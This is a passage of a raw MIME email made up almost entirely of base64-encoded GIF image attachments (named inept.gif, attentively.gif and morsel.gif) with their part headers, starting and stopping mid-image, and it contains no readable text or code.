fzE7X2V5lL7h7pGswD9MbkRScpm1ySUtUqK/0Vhohrra6KvK2yw1WTdEZrjZ52yAmniPpwAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA AAAAJQC0AAAH/oAAgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2u mAECA6IEBQaiBwIIhAkKCwwADQ4PEBHBw8WDEgUTFBUWABcYGQATGhscHQAeBRcfIBUhIiMFJOHj 5YMlJicAKCkAKiuCLC0uLzDBBTGCMhoAMwrQ8AdQIKEaNm7gMJFDhwsAJULsAMCjB0QfBTYA+AEB iMcgHD0CCUKoBw4hLgrMGCKoQgEiAIoYAXAEAJIkAJTMG6QT0RImTQA4eQJFUBQpu6ZQuVAFgJUr AKZgEVQi6lSIhbJoEbTlwSAuSwB0KeBFxBceYEAACCMGjI8xX2vbvi3kgIAgMmUEmTmDJo2aAmte CR5MuLDhw4gTK17MuLHjx5AjS55MubLly5gza97MubPnz6BDix5NurTp06hTq17NurXr17Bjy55N u7bt27hz697Nu7fv38CDkw4EADs= ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="inept.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhHABmAIAAAMru+gAAACwAAAAAHABmAAACOISPqcvtD6OctNqLs968+w+G4kiW5omm6sq2 7gvH8kzX9o3n+s73/g8MCofEovGITCqXzKbzqSgAADs= ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="attentively.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhFwJmAOcAAIgwVpZYecLl8sru+pligb3H2cjp9YkzWYWdtKK/0cXd68Pm84w9YYylu5iy xsnt+ZGrv5+8zsDR4YKZsZWvw5hcfIGYsMjr+MDS4qPA0pexxZmzx8LY55Cqvo2mvJhff4CXr8Xo 9cTn9MHk8YmiuIiht5GswE5efIObskJPb2d7lrjZ55q2yTM9YFlqh6bE1TdCZGZ6lUpYd8js+Lnb 6XuTqrLR4XCFnq7N3q3M3cbp9kNRcVpsiXOJomR4k05de1Fhf6jH2LLS4myAmjdEZsfq96zL3KvK 2zhFZ0RScqPB01JigDlGaJSvwniOpr7h7rfY5rrc6k9ffYScs3yUq1lriH2VrGBzj5+9z73f7K/O 36nI2TdDZcDj8Lvd66fG14mjuZu4y7PT41BgfnKHoL3g7bbW5XiPp6C+0HGGn4qkuiMrUEZTcxcc RCkxVnSJoiIqT11ui6vJ2icvVBogRx4lSzA5XUtZeGt+mbTU5GByjyUtUj9LbSQsUUdUdLra6ENQ cGp9mMDi8FJhfygwVTE6XmN2knqRqTQ+YWx/mqfF1nCEnh0kSlZlg26CnDtHab/h72l8l3+WrneM pTU/YqrI2Wh7lrDP4HOIoXWKoy84XC02WjpGaCAoTSw1WZ26zVhohnaLpK7M3T5KbH6VrWR3k2J1 kQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAFwJmAAAI/gABBBAw oOAAAgAKDDBwIEBBBAASPIw4QIECgwMWAGAwoAEABwUfMOBY8ACABxgHmESJ0SPIlAULACAA0yCE AgEARCgoYaZBhAVWwjxwgGVBlwWBLmzY8aPBCQkHMABg4CcACgMqACA4IOfFmAAO1PSZEqrCmgVz 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 gyRKolvKg0zIhSyNfeyAlAwIADs= ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="morsel.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhewKpAOcAAMru+pCqvow9YZmzx4ObssDR4Zligb3H2cnt+cLl8sXd65ZYeZ+8zsDS4phc fMTn9Mjr+MLY58js+Iiht8jp9ZSvwsPm85Grv5exxYScs6K/0YmiuMHk8YWdtJiyxpq2yb7h7mR4 kzdDZTdCZJGswFJigKbE1S03WzdEZpu4y2V5lEJPb3OJon2VrMfq93CFnlttiqPB08Xo9VFhfzM9 YMDj8HuTqqfG11lriEpYd0NRcanI2URScmZ6lYmjuWBzj7PT405efLvd62yAmnyUq05de8bp9oqk ulpsiajH2L3f7Lnb6ThFZ3iOpp+9z6/O31BgfniPp7fY5jlGaLbW5brc6rjZ573g7bLS4rLR4Vlq h6C+0K3M3XGGn67N3qvK26zL3KrI2aPA0q7M3bDP4G2Bm11ui7ra6A0ROh8nTFZlg3SJolJhf6fF 1hUaQhsiSC02WrTU5BAVPTtHaRYbQ6vJ2mJ1kUZTcycvVICXrxEWPml8lyMrUENQcEtZeCs0WGh7 lhQZQW6CnCgwVYGYsEdUdBwjSSQsUXaLpCw1WSIqTyAoTXWKozA5XTQ+YS84XIylu2F0kHKHoBog R3OIoSUtUmp9mAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAewKpAAAI/gABCBQY QMCAgQAICCgAwEAAhAgLHoQo0ICAAxQzaqSIQICABBotYtxIMqPIkigHSszY8WPKjAoWMABQYIEB BQIHCHh48oAAAy8h1ryZc2cDBwgeeEQAQcADnwZA0nQKEarAAwYiCIyw4OfABw52Qjw5EKpUCQtG CmQgYAIACkutAsCqtaTPiwQrBN1oAOjev4BTkg0ctKdXjh6lUhxMeCDjv2zdwhWAQDDexpgzhzRY 8bLAxAAUWKDZN23nAxU8Qkjt0KOBu1oLlMZIwWJfAQQU9HWgFkAEAQ7e2rZIoODPAg1mN/BYoW/t n8Tn3j5o/LXH2LOFQ8ct3eLEx1uB/mu/TSD0br9jBVCIKQCnQAUCFlQvcKFt9OQG0i4X0Bw9e/eh xVfWYQEuMJpAFDRAkAAYAKBTABAEUIEEZd3mXgaMYdXWQPAt8ABCCkCA0AQCzAQfZQ9GOGFKA4Tl 12sC4ZdWAR4dAB8FWNm420j5UfSbABE8Rx6I55GWH23DcefTAqkJsNpPQkanmwEOtPYTbEaaFiV3 AtF40Y05/hjBfPVNEN1AvwW3ZXGuIaccc311x5l5VFppHZAaxFdAbRjJ2BuJJsY13XtFWqSAAg4M AAFW3gGAAAZVxpfVdWs+GqlNlWn2Elx+dUUBQrYx5NtPHQUHgKd5AoWBABskIN5k/gj8ZkCpp8Fl 00dZIZRqrfG5GlxMBnBqgUcFMOCWSLYCEEAAnALg61tLyUprQxclu2yzp6qX0a7UHmArsBJsUB5E sgJAolsDcZCYeNRatwCwwhJr7EDnIqSuAAOltsFACj2UEQGmKXSBAaKqdEEGAmgAgAYDGDoQBRvQ iF4HYpFkEUMbbCgwwUERwEBYOC3wKbxehUVtBBtgZFECuVJLEazdJvueTeESIC27yAoI1a6r7pvz uzSL+yysN5v6M0ImW4QybUs92+6Suh7287MkGzDsQvNe6xW4Qr+6lARLKeBW1aAuBEDGbmkNFNcE NLWABASMpDYAbFXQLMw/142t/qYvWQUfejGGhZdFCnsUIFAFAaWQBlZJTG3h+LaEgMRhKQxRQQ9J LrFV3kEll6NLOf6WVY17RTgAhmt+GI5bE3i5WKoboNBMEFAIUX16ddXbknKF9cDfnV/pukC6IwR1 Z5Zn29tmzI11QJ65zbrAAghVwAECnhLvGUs1KkTApxY1/xLBqQWAaGcDWBVWAQphVVnlA3VEvVBe xc5viQDUfnrqoXtV0AWJS0jCYje7/EmgdEDZX+T6B7j1tW9WUwFK75zyt4jAjoGcM4jnhsc6xeGv dgjsTAQmgJPgoaclB/Dep0bnlQLWTmIGmMnDMqgAn7jFcbEzlA35Vhj+zGV4/tqhXlc40KEfJpAz FmlAQTxANwFkIFtEFFAF2WIAnfiwbBiZ4k+WmC3Zxc0DFTtcE7PSF4vohYtseeIQi6hFMt5GL59L 